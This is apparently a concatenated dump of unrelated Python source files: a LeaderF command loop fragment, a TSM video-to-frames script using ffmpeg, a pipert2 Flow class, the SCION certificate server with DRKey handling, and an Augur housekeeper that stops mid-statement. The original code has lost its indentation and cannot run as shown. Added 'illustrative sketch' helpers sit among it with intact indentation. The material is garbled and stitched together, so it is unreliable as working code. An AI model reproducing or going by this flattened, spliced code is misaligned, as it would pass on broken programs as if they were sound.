elif equal(cmd, '<C-Up>'):
self._toUpInPopup()
elif equal(cmd, '<C-Down>'):
self._toDownInPopup()
else:
if self._cmdExtension(cmd):
break
# vim: set ts=4 sw=4 tw=0 et :
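# --- Illustrative sketch (not part of LeaderF): the long elif chain in input()
# above is a command-dispatch loop. The same control flow can be written with a
# dispatch table; every name below is hypothetical and exists only for illustration.
def dispatch_commands(commands, handlers, default=None):
    """Invoke a handler per command name; a truthy return value leaves the loop."""
    for cmd in commands:
        handler = handlers.get(cmd, default)
        if handler is not None and handler(cmd):
            break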
|
vid2img_sthv2.py
|
# -*- coding: utf-8 -*-
# @Author: KunchangLi
# @Date: 2020-02-26 13:10:59
# @LastEditor: KunchangLi
# @LastEditTime: 2020-02-26 13:11:00
# Code for "TSM: Temporal Shift Module for Efficient Video Understanding"
# arXiv:1811.08383
# Ji Lin*, Chuang Gan, Song Han
# {jilin, songhan}@mit.edu, ganchuang@csail.mit.edu
import os
import threading
NUM_THREADS = 100
VIDEO_ROOT = '/ssd/video/something/v2/20bn-something-something-v2' # Downloaded webm videos
FRAME_ROOT = '/ssd/video/something/v2/20bn-something-something-v2-frames' # Directory for extracted frames
def split(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def extract(video, tmpl='%06d.jpg'):
# os.system(f'ffmpeg -i {VIDEO_ROOT}/{video} -vf -threads 1 -vf scale=-1:256 -q:v 0 '
# f'{FRAME_ROOT}/{video[:-5]}/{tmpl}')
cmd = 'ffmpeg -i \"{}/{}\" -threads 1 -vf scale=-1:256 -q:v 0 \"{}/{}/%06d.jpg\"'.format(VIDEO_ROOT, video, FRAME_ROOT, video[:-5])
os.system(cmd)
def target(video_list):
for video in video_list:
        os.makedirs(os.path.join(FRAME_ROOT, video[:-5]), exist_ok=True)
extract(video)
if __name__ == '__main__':
if not os.path.exists(VIDEO_ROOT):
raise ValueError('Please download videos and set VIDEO_ROOT variable.')
if not os.path.exists(FRAME_ROOT):
os.makedirs(FRAME_ROOT)
video_list = os.listdir(VIDEO_ROOT)
splits = list(split(video_list, NUM_THREADS))
threads = []
    for chunk in splits:
        thread = threading.Thread(target=target, args=(chunk,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
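# --- Optional sketch (assumption, not part of the original TSM tooling): the
# manual chunk-and-thread pattern above can also be written with
# concurrent.futures, which handles joining and error propagation for us.
def extract_all_with_pool(max_workers=NUM_THREADS):
    """Extract frames for every video under VIDEO_ROOT using a thread pool."""
    from concurrent.futures import ThreadPoolExecutor
    videos = os.listdir(VIDEO_ROOT)
    for video in videos:
        os.makedirs(os.path.join(FRAME_ROOT, video[:-5]), exist_ok=True)
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # extract() shells out to ffmpeg, so worker threads mostly wait on the subprocess.
        list(pool.map(extract, videos))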
|
flow.py
|
from typing import List
from logging import Logger
from multiprocessing import Process
from pipert2.core.base.routine import Routine
from pipert2.core.handlers import EventHandler
from pipert2.core.managers.event_board import EventBoard
from pipert2.utils.method_data import Method
from pipert2.utils.annotations import class_functions_dictionary
from pipert2.utils.consts.event_names import START_EVENT_NAME, STOP_EVENT_NAME, KILL_EVENT_NAME
from pipert2.utils.interfaces.event_executor_interface import EventExecutorInterface
from pipert2.utils.dummy_object import Dummy
class Flow(EventExecutorInterface):
"""Flow is an entity designed for running a group of routines in a single process.
    It is also responsible for notifying its routines when an event is triggered.
"""
events = class_functions_dictionary()
def __init__(self, name: str, event_board: EventBoard, logger: Logger, routines: List[Routine]):
"""
Args:
name (str): Name of the flow.
event_board (EventBoard): The EventBoard of the pipe.
logger (Logger): Logger object for logging the flow actions.
            routines (List[Routine]): The routines that will be in the flow.
Attributes:
routines (dict[str, Routine]): Dictionary mapping the routines to their name.
name (str): Name of the flow.
logger (Logger): Logger object for logging the flow actions.
event_handler (EventHandler): EventHandler object for communicating with the
event system of the pipe.
"""
self.routines = {}
self.name = name
self._logger = logger
self.flow_process = Dummy()
flow_events_to_listen = set(self.get_events().keys())
for routine in routines:
routine.set_logger(logger=logger.getChild(routine.name))
routine.flow_name = self.name
flow_events_to_listen.update(routine.get_events().keys())
self.routines[routine.name] = routine
self.event_handler: EventHandler = event_board.get_event_handler(flow_events_to_listen)
def build(self) -> None:
"""Start the flow process.
"""
self.flow_process = Process(target=self.run)
self.flow_process.start()
def run(self) -> None:
"""The flow process, executing the pipe events that occur.
"""
event: Method = self.event_handler.wait()
while event.event_name != KILL_EVENT_NAME:
self.execute_event(event)
event = self.event_handler.wait()
self.execute_event(Method(STOP_EVENT_NAME))
for routine in self.routines.values():
routine.join()
@events(START_EVENT_NAME)
def start(self):
self._logger.plog("Starting")
@events(STOP_EVENT_NAME)
def stop(self):
self._logger.plog("Stopping")
def execute_event(self, event: Method) -> None:
"""Execute the event callbacks in the flow and its routines.
Args:
event: The event to be executed.
"""
if event.is_applied_on_flow(self.name):
if event.is_applied_on_specific_routines(self.name):
routines = event.specific_flow_routines.get(self.name)
for routine in routines:
if routine in self.routines.keys():
self.routines.get(routine).execute_event(event)
else:
for routine in self.routines.values():
routine.execute_event(event)
EventExecutorInterface.execute_event(self, event)
def join(self) -> None:
"""Block until the flow process terminates
"""
self.flow_process.join()
@classmethod
def get_events(cls):
"""Get the events of the flow.
Returns:
dict[str, set[Callback]]: The events callbacks mapped by their events.
"""
return cls.events.all[cls.__name__]
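# --- Standalone sketch (assumption, not the pipert2 API): run() above follows a
# plain "consume events until KILL" loop. Any queue-like object with get() can
# stand in for the EventHandler to illustrate the control flow.
def _event_loop_sketch(event_queue, execute, kill_name=KILL_EVENT_NAME, stop_name=STOP_EVENT_NAME):
    """Consume Method-like events from event_queue until the kill event arrives."""
    event = event_queue.get()
    while event.event_name != kill_name:
        execute(event)              # dispatch to the flow and its routines
        event = event_queue.get()
    execute(Method(stop_name))      # make sure routines are stopped before exiting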
|
main.py
|
#!/usr/bin/python3
# Copyright 2014 ETH Zurich
# Copyright 2018 ETH Zurich, Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`base` --- SCION certificate server
========================================
"""
# Stdlib
import datetime
import logging
import threading
# External packages
from nacl.exceptions import CryptoError
from prometheus_client import Counter, Gauge
# SCION
from external.expiring_dict import ExpiringDict
from lib.crypto.asymcrypto import get_enc_key, get_sig_key
from lib.crypto.certificate_chain import CertificateChain, verify_sig_chain_trc
from lib.crypto.trc import TRC
from lib.crypto.symcrypto import crypto_hash
from lib.crypto.symcrypto import kdf
from lib.crypto.util import get_master_key, MASTER_KEY_0
from lib.defines import GEN_CACHE_PATH
from lib.drkey.drkey_mgmt import (
DRKeyMgmt,
DRKeyReply,
DRKeyRequest,
)
from lib.drkey.suite import (
decrypt_drkey,
drkey_signing_input_req,
get_drkey_reply,
get_drkey_request,
get_signing_input_rep,
)
from lib.drkey.types import DRKeySecretValue, FirstOrderDRKey
from lib.drkey.util import drkey_time, get_drkey_exp_time
from lib.errors import SCIONVerificationError
from lib.main import main_default, main_wrapper
from lib.packet.cert_mgmt import (
CertMgmt,
CertChainReply,
CertChainRequest,
TRCReply,
TRCRequest,
)
from lib.packet.ctrl_pld import CtrlPayload, mk_ctrl_req_id
from lib.packet.svc import SVCType
from lib.requests import RequestHandler
from lib.thread import thread_safety_net
from lib.types import (
CertMgmtType,
DRKeyMgmtType,
PayloadClass,
ServiceType
)
from lib.util import (
SCIONTime,
sleep_interval,
)
from lib.zk.cache import ZkSharedCache
from lib.zk.errors import ZkNoConnection
from lib.zk.id import ZkID
from lib.zk.zk import ZK_LOCK_SUCCESS, Zookeeper
from scion_elem.scion_elem import SCIONElement
# Exported metrics.
REQS_TOTAL = Counter("cs_requests_total", "# of total requests", ["server_id", "isd_as", "type"])
IS_MASTER = Gauge("cs_is_master", "true if this process is the replication master",
["server_id", "isd_as"])
# Max amount of DRKey secret values. 1 current, 1 prefetch, 1 buffer.
DRKEY_MAX_SV = 3
# Max TTL of first order DRKey. 1 Day prefetch, 1 Day current.
DRKEY_MAX_TTL = datetime.timedelta(days=2).total_seconds()
# Max number of stored first order DRKeys
DRKEY_MAX_KEYS = 10**6
# Timeout for first order DRKey requests
DRKEY_REQUEST_TIMEOUT = 5
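# --- Illustrative helper (assumption, not used by the server): the TTL above is
# sized to hold two one-day secret-value windows, the currently valid one plus
# the prefetched one.
def _drkey_cache_ttl(current_days=1, prefetch_days=1):
    """Return the cache TTL (seconds) covering the current and prefetched secrets."""
    return datetime.timedelta(days=current_days + prefetch_days).total_seconds()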
class CertServer(SCIONElement):
"""
The SCION Certificate Server.
"""
SERVICE_TYPE = ServiceType.CS
# ZK path for incoming cert chains
ZK_CC_CACHE_PATH = "cert_chain_cache"
# ZK path for incoming TRCs
ZK_TRC_CACHE_PATH = "trc_cache"
ZK_DRKEY_PATH = "drkey_cache"
def __init__(self, server_id, conf_dir, spki_cache_dir=GEN_CACHE_PATH,
prom_export=None, sciond_path=None):
"""
:param str server_id: server identifier.
:param str conf_dir: configuration directory.
:param str prom_export: prometheus export address.
:param str sciond_path: path to sciond socket.
"""
super().__init__(server_id, conf_dir, spki_cache_dir=spki_cache_dir,
prom_export=prom_export, sciond_path=sciond_path)
self.config = self._load_as_conf()
cc_labels = {**self._labels, "type": "cc"} if self._labels else None
trc_labels = {**self._labels, "type": "trc"} if self._labels else None
drkey_labels = {**self._labels, "type": "drkey"} if self._labels else None
self.cc_requests = RequestHandler.start(
"CC Requests", self._check_cc, self._fetch_cc, self._reply_cc,
labels=cc_labels,
)
self.trc_requests = RequestHandler.start(
"TRC Requests", self._check_trc, self._fetch_trc, self._reply_trc,
labels=trc_labels,
)
self.drkey_protocol_requests = RequestHandler.start(
"DRKey Requests", self._check_drkey, self._fetch_drkey, self._reply_proto_drkey,
labels=drkey_labels,
)
self.CTRL_PLD_CLASS_MAP = {
PayloadClass.CERT: {
CertMgmtType.CERT_CHAIN_REQ: self.process_cert_chain_request,
CertMgmtType.CERT_CHAIN_REPLY: self.process_cert_chain_reply,
CertMgmtType.TRC_REQ: self.process_trc_request,
CertMgmtType.TRC_REPLY: self.process_trc_reply,
},
PayloadClass.DRKEY: {
DRKeyMgmtType.FIRST_ORDER_REQUEST:
self.process_drkey_request,
DRKeyMgmtType.FIRST_ORDER_REPLY:
self.process_drkey_reply,
},
}
zkid = ZkID.from_values(self.addr.isd_as, self.id,
[(self.addr.host, self._port)]).pack()
self.zk = Zookeeper(self.topology.isd_as, self.SERVICE_TYPE,
zkid, self.topology.zookeepers)
self.zk.retry("Joining party", self.zk.party_setup)
self.trc_cache = ZkSharedCache(self.zk, self.ZK_TRC_CACHE_PATH,
self._cached_trcs_handler)
self.cc_cache = ZkSharedCache(self.zk, self.ZK_CC_CACHE_PATH,
self._cached_certs_handler)
self.drkey_cache = ZkSharedCache(self.zk, self.ZK_DRKEY_PATH,
self._cached_drkeys_handler)
self.master_key = get_master_key(self.conf_dir, MASTER_KEY_0)
self.signing_key = get_sig_key(self.conf_dir)
self.private_key = get_enc_key(self.conf_dir)
self.drkey_secrets = ExpiringDict(DRKEY_MAX_SV, DRKEY_MAX_TTL)
self.first_order_drkeys = ExpiringDict(DRKEY_MAX_KEYS, DRKEY_MAX_TTL)
def worker(self):
"""
Worker thread that takes care of reading shared entries from ZK, and
handling master election.
"""
worker_cycle = 1.0
start = SCIONTime.get_time()
while self.run_flag.is_set():
sleep_interval(start, worker_cycle, "CS.worker cycle",
self._quiet_startup())
start = SCIONTime.get_time()
# Update IS_MASTER metric.
if self._labels:
IS_MASTER.labels(**self._labels).set(int(self.zk.have_lock()))
try:
self.zk.wait_connected()
self.trc_cache.process()
self.cc_cache.process()
self.drkey_cache.process()
# Try to become a master.
ret = self.zk.get_lock(lock_timeout=0, conn_timeout=0)
if ret: # Either got the lock, or already had it.
if ret == ZK_LOCK_SUCCESS:
logging.info("Became master")
self.trc_cache.expire(worker_cycle * 10)
self.cc_cache.expire(worker_cycle * 10)
self.drkey_cache.expire(worker_cycle * 10)
except ZkNoConnection:
                logging.warning('worker(): ZkNoConnection')
def _cached_trcs_handler(self, raw_entries):
"""
Handles cached (through ZK) TRCs, passed as a list.
"""
for raw in raw_entries:
trc = TRC.from_raw(raw.decode('utf-8'))
rep = CtrlPayload(CertMgmt(TRCReply.from_values(trc)))
self.process_trc_reply(rep, None, from_zk=True)
if len(raw_entries) > 0:
logging.debug("Processed %s trcs from ZK", len(raw_entries))
def _cached_certs_handler(self, raw_entries):
"""
Handles cached (through ZK) chains, passed as a list.
"""
for raw in raw_entries:
cert = CertificateChain.from_raw(raw.decode('utf-8'))
rep = CtrlPayload(CertMgmt(CertChainReply.from_values(cert)))
self.process_cert_chain_reply(rep, None, from_zk=True)
if len(raw_entries) > 0:
logging.debug("Processed %s certs from ZK", len(raw_entries))
def _cached_drkeys_handler(self, raw_entries):
for raw in raw_entries:
msg = CtrlPayload(DRKeyMgmt(DRKeyReply.from_raw(raw)))
self.process_drkey_reply(msg, None, from_zk=True)
def _share_object(self, pld, is_trc):
"""
Share path segments (via ZK) with other path servers.
"""
pld_packed = pld.pack()
pld_hash = crypto_hash(pld_packed).hex()
try:
if is_trc:
self.trc_cache.store("%s-%s" % (pld_hash, SCIONTime.get_time()),
pld_packed)
else:
self.cc_cache.store("%s-%s" % (pld_hash, SCIONTime.get_time()),
pld_packed)
except ZkNoConnection:
logging.warning("Unable to store %s in shared path: "
"no connection to ZK" % "TRC" if is_trc else "CC")
return
logging.debug("%s stored in ZK: %s" % ("TRC" if is_trc else "CC",
pld_hash))
def process_cert_chain_request(self, cpld, meta):
"""Process a certificate chain request."""
cmgt = cpld.union
req = cmgt.union
assert isinstance(req, CertChainRequest), type(req)
key = req.isd_as(), req.p.version
logging.info("Cert chain request received for %sv%s from %s", *key, meta)
REQS_TOTAL.labels(**self._labels, type="cc").inc()
local = meta.ia == self.addr.isd_as
if not self._check_cc(key):
if not local:
logging.warning(
"Dropping CC request from %s for %sv%s: "
"CC not found && requester is not local)",
meta, *key)
else:
self.cc_requests.put((key, (meta, req, cpld.req_id)))
return
self._reply_cc(key, (meta, req, cpld.req_id))
def process_cert_chain_reply(self, cpld, meta, from_zk=False):
"""Process a certificate chain reply."""
cmgt = cpld.union
rep = cmgt.union
assert isinstance(rep, CertChainReply), type(rep)
ia_ver = rep.chain.get_leaf_isd_as_ver()
logging.info("Cert chain reply received for %sv%s (ZK: %s)" %
(ia_ver[0], ia_ver[1], from_zk))
self.trust_store.add_cert(rep.chain)
if not from_zk:
self._share_object(rep.chain, is_trc=False)
# Reply to all requests for this certificate chain
self.cc_requests.put((ia_ver, None))
# If the new version is the max version also reply to NEWEST_VERSION requests.
max_ver = self.trust_store.get_cert(ia_ver[0]).get_leaf_isd_as_ver()[1]
if max_ver == ia_ver[1]:
ia_ver0 = (ia_ver[0], CertChainRequest.NEWEST_VERSION)
self.cc_requests.put((ia_ver0, None))
def _check_cc(self, key):
isd_as, ver = key
cert_chain = self.trust_store.get_cert(isd_as, ver)
if cert_chain:
return True
logging.debug('Cert chain not found for %sv%s', *key)
return False
def _fetch_cc(self, key, req_info):
# Do not attempt to fetch the CertChain from a remote AS if the cacheOnly flag is set.
_, orig_req, _ = req_info
if orig_req.p.cacheOnly:
return
self._send_cc_request(*key)
def _send_cc_request(self, isd_as, ver):
req = CertChainRequest.from_values(isd_as, ver, cache_only=True)
path_meta = self._get_path_via_sciond(isd_as)
if path_meta:
meta = self._build_meta(isd_as, host=SVCType.CS_A, path=path_meta.fwd_path())
req_id = mk_ctrl_req_id()
self.send_meta(CtrlPayload(CertMgmt(req), req_id=req_id), meta)
logging.info("Cert chain request sent to %s via [%s]: %s [id: %016x]",
meta, path_meta.short_desc(), req.short_desc(), req_id)
else:
logging.warning("Cert chain request (for %s) not sent: "
"no path found", req.short_desc())
def _reply_cc(self, key, req_info):
isd_as, ver = key
meta = req_info[0]
req_id = req_info[2]
cert_chain = self.trust_store.get_cert(isd_as, ver)
self.send_meta(
CtrlPayload(CertMgmt(CertChainReply.from_values(cert_chain)), req_id=req_id), meta)
logging.info("Cert chain for %sv%s sent to %s [id: %016x]", isd_as, ver, meta, req_id)
def process_trc_request(self, cpld, meta):
"""Process a TRC request."""
cmgt = cpld.union
req = cmgt.union
assert isinstance(req, TRCRequest), type(req)
key = req.isd_as()[0], req.p.version
logging.info("TRC request received for %sv%s from %s [id: %s]",
*key, meta, cpld.req_id_str())
REQS_TOTAL.labels(**self._labels, type="trc").inc()
local = meta.ia == self.addr.isd_as
if not self._check_trc(key):
if not local:
logging.warning(
"Dropping TRC request from %s for %sv%s: "
"TRC not found && requester is not local)",
meta, *key)
else:
self.trc_requests.put((key, (meta, req, cpld.req_id)))
return
self._reply_trc(key, (meta, req, cpld.req_id))
def process_trc_reply(self, cpld, meta, from_zk=False):
"""
Process a TRC reply.
:param trc_rep: TRC reply.
:type trc_rep: TRCReply
"""
cmgt = cpld.union
trc_rep = cmgt.union
assert isinstance(trc_rep, TRCReply), type(trc_rep)
isd, ver = trc_rep.trc.get_isd_ver()
logging.info("TRCReply received for ISD %sv%s, ZK: %s [id: %s]",
isd, ver, from_zk, cpld.req_id_str())
self.trust_store.add_trc(trc_rep.trc)
if not from_zk:
self._share_object(trc_rep.trc, is_trc=True)
# Reply to all requests for this TRC
self.trc_requests.put(((isd, ver), None))
# If the new version is the max version also reply to NEWEST_VERSION requests.
max_ver = self.trust_store.get_trc(isd).get_isd_ver()[1]
if max_ver == ver:
self.trc_requests.put(((isd, TRCRequest.NEWEST_VERSION), None))
def _check_trc(self, key):
isd, ver = key
ver = None if ver == TRCRequest.NEWEST_VERSION else ver
trc = self.trust_store.get_trc(isd, ver)
if trc:
return True
logging.debug('TRC not found for %sv%s', *key)
return False
def _fetch_trc(self, key, req_info):
# Do not attempt to fetch the TRC from a remote AS if the cacheOnly flag is set.
_, orig_req, _ = req_info
if orig_req.p.cacheOnly:
return
self._send_trc_request(*key)
def _send_trc_request(self, isd, ver):
trc_req = TRCRequest.from_values(isd, ver, cache_only=True)
path_meta = self._get_path_via_sciond(trc_req.isd_as())
if path_meta:
meta = self._build_meta(
path_meta.dst_ia(), host=SVCType.CS_A, path=path_meta.fwd_path())
req_id = mk_ctrl_req_id()
self.send_meta(CtrlPayload(CertMgmt(trc_req), req_id=req_id), meta)
logging.info("TRC request sent to %s via [%s]: %s [id: %016x]",
meta, path_meta.short_desc(), trc_req.short_desc(), req_id)
else:
logging.warning("TRC request not sent for %s: no path found.", trc_req.short_desc())
def _reply_trc(self, key, req_info):
isd, ver = key
ver = None if ver == TRCRequest.NEWEST_VERSION else ver
meta = req_info[0]
req_id = req_info[2]
trc = self.trust_store.get_trc(isd, ver)
self.send_meta(CtrlPayload(CertMgmt(TRCReply.from_values(trc)), req_id=req_id), meta)
logging.info("TRC for %sv%s sent to %s [id: %016x]", isd, ver, meta, req_id)
def process_drkey_request(self, cpld, meta):
"""
Process first order DRKey requests from other ASes.
:param DRKeyRequest req: the DRKey request
:param UDPMetadata meta: the metadata
"""
dpld = cpld.union
req = dpld.union
assert isinstance(req, DRKeyRequest), type(req)
logging.info("DRKeyRequest received from %s: %s [id: %s]",
meta, req.short_desc(), cpld.req_id_str())
REQS_TOTAL.labels(**self._labels, type="drkey").inc()
try:
cert = self._verify_drkey_request(req, meta)
except SCIONVerificationError as e:
logging.warning("Invalid DRKeyRequest from %s. Reason %s: %s", meta, e,
req.short_desc())
return
sv = self._get_drkey_secret(get_drkey_exp_time(req.p.flags.prefetch))
cert_version = self.trust_store.get_cert(self.addr.isd_as).certs[0].version
trc_version = self.trust_store.get_trc(self.addr.isd_as[0]).version
rep = get_drkey_reply(sv, self.addr.isd_as, meta.ia, self.private_key,
self.signing_key, cert_version, cert, trc_version)
self.send_meta(CtrlPayload(DRKeyMgmt(rep), req_id=cpld.req_id), meta)
logging.info("DRKeyReply sent to %s: %s [id: %s]",
meta, req.short_desc(), cpld.req_id_str())
def _verify_drkey_request(self, req, meta):
"""
Verify that the first order DRKey request is legit.
I.e. the signature is valid, the correct ISD AS is queried, timestamp is recent.
:param DRKeyRequest req: the first order DRKey request.
:param UDPMetadata meta: the metadata.
:returns Certificate of the requester.
:rtype: Certificate
:raises: SCIONVerificationError
"""
if self.addr.isd_as != req.isd_as:
raise SCIONVerificationError("Request for other ISD-AS: %s" % req.isd_as)
if drkey_time() - req.p.timestamp > DRKEY_REQUEST_TIMEOUT:
raise SCIONVerificationError("Expired request from %s. %ss old. Max %ss" % (
meta.ia, drkey_time() - req.p.timestamp, DRKEY_REQUEST_TIMEOUT))
trc = self.trust_store.get_trc(meta.ia[0])
chain = self.trust_store.get_cert(meta.ia, req.p.certVer)
err = []
if not chain:
self._send_cc_request(meta.ia, req.p.certVer)
err.append("Certificate not present for %s(v: %s)" % (meta.ia, req.p.certVer))
if not trc:
self._send_trc_request(meta.ia[0], req.p.trcVer)
err.append("TRC not present for %s(v: %s)" % (meta.ia[0], req.p.trcVer))
if err:
raise SCIONVerificationError(", ".join(err))
raw = drkey_signing_input_req(req.isd_as, req.p.flags.prefetch, req.p.timestamp)
try:
verify_sig_chain_trc(raw, req.p.signature, meta.ia, chain, trc)
except SCIONVerificationError as e:
raise SCIONVerificationError(str(e))
return chain.certs[0]
def process_drkey_reply(self, cpld, meta, from_zk=False):
"""
Process first order DRKey reply from other ASes.
:param DRKeyReply rep: the received DRKey reply
:param UDPMetadata meta: the metadata
:param Bool from_zk: if the reply has been received from Zookeeper
"""
dpld = cpld.union
rep = dpld.union
assert isinstance(rep, DRKeyReply), type(rep)
logging.info("DRKeyReply received from %s: %s [id: %s]",
meta, rep.short_desc(), cpld.req_id_str())
src = meta or "ZK"
try:
cert = self._verify_drkey_reply(rep, meta)
raw = decrypt_drkey(rep.p.cipher, self.private_key, cert.subject_enc_key_raw)
except SCIONVerificationError as e:
logging.info("Invalid DRKeyReply from %s. Reason %s: %s", src, e, rep.short_desc())
return
except CryptoError as e:
logging.info("Unable to decrypt DRKeyReply from %s. Reason %s: %s", src, e,
rep.short_desc())
return
drkey = FirstOrderDRKey(rep.isd_as, self.addr.isd_as, rep.p.expTime, raw)
self.first_order_drkeys[drkey] = drkey
if not from_zk:
pld_packed = rep.copy().pack()
try:
self.drkey_cache.store("%s-%s" % (rep.isd_as, rep.p.expTime),
pld_packed)
except ZkNoConnection:
logging.warning("Unable to store DRKey for %s in shared path: "
"no connection to ZK" % rep.isd_as)
return
self.drkey_protocol_requests.put((drkey, None))
def _verify_drkey_reply(self, rep, meta):
"""
Verify that the first order DRKey reply is legit.
I.e. the signature matches, timestamp is recent.
:param DRKeyReply rep: the first order DRKey reply.
:param UDPMetadata meta: the metadata.
:returns Certificate of the responder.
:rtype: Certificate
:raises: SCIONVerificationError
"""
if meta and meta.ia != rep.isd_as:
raise SCIONVerificationError("Response from other ISD-AS: %s" % rep.isd_as)
if drkey_time() - rep.p.timestamp > DRKEY_REQUEST_TIMEOUT:
raise SCIONVerificationError("Expired reply from %s. %ss old. Max %ss" % (
rep.isd_as, drkey_time() - rep.p.timestamp, DRKEY_REQUEST_TIMEOUT))
trc = self.trust_store.get_trc(rep.isd_as[0])
chain = self.trust_store.get_cert(rep.isd_as, rep.p.certVerSrc)
err = []
if not chain:
self._send_cc_request(rep.isd_as, rep.p.certVerSrc)
err.append("Certificate not present for %s(v: %s)" % (rep.isd_as, rep.p.certVerSrc))
if not trc:
self._send_trc_request(rep.isd_as[0], rep.p.trcVer)
err.append("TRC not present for %s(v: %s)" % (rep.isd_as[0], rep.p.trcVer))
if err:
raise SCIONVerificationError(", ".join(err))
raw = get_signing_input_rep(rep.isd_as, rep.p.timestamp, rep.p.expTime, rep.p.cipher)
try:
verify_sig_chain_trc(raw, rep.p.signature, rep.isd_as, chain, trc)
except SCIONVerificationError as e:
raise SCIONVerificationError(str(e))
return chain.certs[0]
def _check_drkey(self, drkey):
"""
Check if first order DRKey with the same (SrcIA, DstIA, expTime)
is available.
:param FirstOrderDRKey drkey: the searched DRKey.
        :returns: whether the first order DRKey is available.
:rtype: Bool
"""
if drkey in self.first_order_drkeys:
return True
return False
def _fetch_drkey(self, drkey, _):
"""
Fetch missing first order DRKey with the same (SrcIA, DstIA, expTime).
:param FirstOrderDRKey drkey: The missing DRKey.
"""
cert = self.trust_store.get_cert(self.addr.isd_as)
trc = self.trust_store.get_trc(self.addr.isd_as[0])
if not cert or not trc:
logging.warning("DRKeyRequest for %s not sent. Own CertChain/TRC not present.",
drkey.src_ia)
return
req = get_drkey_request(drkey.src_ia, False, self.signing_key,
cert.certs[0].version, trc.version)
path_meta = self._get_path_via_sciond(drkey.src_ia)
if path_meta:
meta = self._build_meta(drkey.src_ia, host=SVCType.CS_A, path=path_meta.fwd_path())
req_id = mk_ctrl_req_id()
            self.send_meta(CtrlPayload(DRKeyMgmt(req), req_id=req_id), meta)
logging.info("DRKeyRequest (%s) sent to %s via %s [id: %016x]",
req.short_desc(), meta, path_meta, req_id)
else:
logging.warning("DRKeyRequest (for %s) not sent", req.short_desc())
def _reply_proto_drkey(self, drkey, meta):
pass # TODO(roosd): implement in future PR
def _get_drkey_secret(self, exp_time):
"""
Get the drkey secret. A new secret is initialized if no secret is found.
:param int exp_time: expiration time of the drkey secret
:return: the according drkey secret
:rtype: DRKeySecretValue
"""
sv = self.drkey_secrets.get(exp_time)
if not sv:
sv = DRKeySecretValue(kdf(self.master_key, b"Derive DRKey Key"), exp_time)
self.drkey_secrets[sv.exp_time] = sv
return sv
def _init_metrics(self):
super()._init_metrics()
for type_ in ("trc", "cc", "drkey"):
REQS_TOTAL.labels(**self._labels, type=type_).inc(0)
IS_MASTER.labels(**self._labels).set(0)
def run(self):
"""
Run an instance of the Cert Server.
"""
threading.Thread(
target=thread_safety_net, args=(self.worker,),
name="CS.worker", daemon=True).start()
super().run()
if __name__ == "__main__":
main_wrapper(main_default, CertServer)
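# --- Standalone sketch (assumption, not SCION code): CertServer._get_drkey_secret()
# above is a derive-on-miss cache keyed by expiration time. The same pattern using
# only the standard library; hmac-sha256 stands in for the project's kdf().
def derive_secret_on_miss(cache, master_key, exp_time, info=b"Derive DRKey Key"):
    """Return the secret for exp_time, deriving and caching it when missing."""
    import hashlib
    import hmac
    secret = cache.get(exp_time)
    if secret is None:
        secret = hmac.new(master_key, info, hashlib.sha256).digest()
        cache[exp_time] = secret
    return secret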
|
housekeeper.py
|
#SPDX-License-Identifier: MIT
"""
Keeps data up to date
"""
import coloredlogs
from copy import deepcopy
import logging, os, time, requests
import logging.config
from multiprocessing import Process, get_start_method
from sqlalchemy.ext.automap import automap_base
import sqlalchemy as s
import pandas as pd
from sqlalchemy import MetaData
from augur.logging import AugurLogging
from urllib.parse import urlparse
import warnings
warnings.filterwarnings('ignore')
logger = logging.getLogger(__name__)
class Housekeeper:
def __init__(self, broker, augur_app):
logger.info("Booting housekeeper")
self._processes = []
self.augur_logging = augur_app.logging
self.jobs = deepcopy(augur_app.config.get_value("Housekeeper", "jobs"))
self.update_redirects = deepcopy(augur_app.config.get_value("Housekeeper", "update_redirects"))
self.broker_host = augur_app.config.get_value("Server", "host")
self.broker_port = augur_app.config.get_value("Server", "port")
self.broker = broker
self.db = augur_app.database
self.helper_db = augur_app.operations_database
helper_metadata = MetaData()
helper_metadata.reflect(self.helper_db, only=['worker_job'])
HelperBase = automap_base(metadata=helper_metadata)
HelperBase.prepare()
self.job_table = HelperBase.classes.worker_job.__table__
repoUrlSQL = s.sql.text("""
SELECT repo_git FROM repo
""")
rs = pd.read_sql(repoUrlSQL, self.db, params={})
all_repos = rs['repo_git'].values.tolist()
# If enabled, updates all redirects of repositories
# and organizations urls for configured repo_group_id
self.update_url_redirects()
# List of tasks that need periodic updates
self.schedule_updates()
def schedule_updates(self):
"""
Starts update processes
"""
self.prep_jobs()
self.augur_logging.initialize_housekeeper_logging_listener()
logger.info("Scheduling update processes")
for job in self.jobs:
process = Process(target=self.updater_process, name=job["model"], args=(self.broker_host, self.broker_port, self.broker, job, (self.augur_logging.housekeeper_job_config, self.augur_logging.get_config())))
self._processes.append(process)
process.start()
@staticmethod
def updater_process(broker_host, broker_port, broker, job, logging_config):
"""
Controls a given plugin's update process
"""
logging.config.dictConfig(logging_config[0])
logger = logging.getLogger(f"augur.jobs.{job['model']}")
coloredlogs.install(level=logging_config[1]["log_level"], logger=logger, fmt=logging_config[1]["format_string"])
if logging_config[1]["quiet"]:
            logger.disabled = True
if 'repo_group_id' in job:
repo_group_id = job['repo_group_id']
logger.info('Housekeeper spawned {} model updater process for repo group id {}'.format(job['model'], repo_group_id))
else:
repo_group_id = None
logger.info('Housekeeper spawned {} model updater process for repo ids {}'.format(job['model'], job['repo_ids']))
try:
compatible_worker_found = False
# Waiting for compatible worker
while True:
if not compatible_worker_found:
for worker in list(broker._getvalue().keys()):
if job['model'] in broker[worker]['models'] and job['given'] in broker[worker]['given']:
compatible_worker_found = True
time.sleep(3)
continue
logger.info("Housekeeper recognized that the broker has a worker that " +
"can handle the {} model... beginning to distribute maintained tasks".format(job['model']))
while True:
logger.info('Housekeeper updating {} model with given {}...'.format(
job['model'], job['given'][0]))
if job['given'][0] == 'git_url' or job['given'][0] == 'github_url':
for repo in job['repos']:
if job['given'][0] == 'github_url' and 'github.com' not in repo['repo_git']:
continue
given_key = 'git_url' if job['given'][0] == 'git_url' else 'github_url'
task = {
